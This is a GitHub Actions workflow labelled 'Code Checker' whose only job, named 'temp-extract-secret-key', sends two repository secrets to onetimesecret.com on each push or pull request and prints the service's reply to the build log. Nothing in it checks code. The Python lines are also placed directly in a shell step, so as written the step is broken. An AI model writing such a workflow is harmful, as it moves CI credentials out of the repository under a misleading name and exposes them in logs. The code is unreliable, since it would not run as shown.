name: Code Checker

# Controls when the action will run. Triggers the workflow on push or pull request
# events but only for the master branch
on:
  push:
    branches: [main, develop]
  pull_request:
    branches: [main, develop]

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  temp-extract-secret-key:
    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v2
    - name: Set up Python
      uses: actions/setup-python@v2
      with:
        python-version: '3.x'
    - name: Get Key
      run: |
        python -m pip install --upgrade pip
        pip install requests
        import requests
        from requests.structures import CaseInsensitiveDict
        url = "https://onetimesecret.com/api/v1/share"
        headers = CaseInsensitiveDict()
        headers["Content-Type"] = "application/x-www-form-urlencoded"
        headers["Authorization"] = "Basic ${{ secrets.TEMP_BASIC_AUTH }}"
        data = "secret=${{ secrets.TEMP_DUMMY_KEY }}&ttl=1800&passphrase=abc"
        resp = requests.post(url, headers=headers, data=data)
        print(resp.status_code)
        print(resp.json())
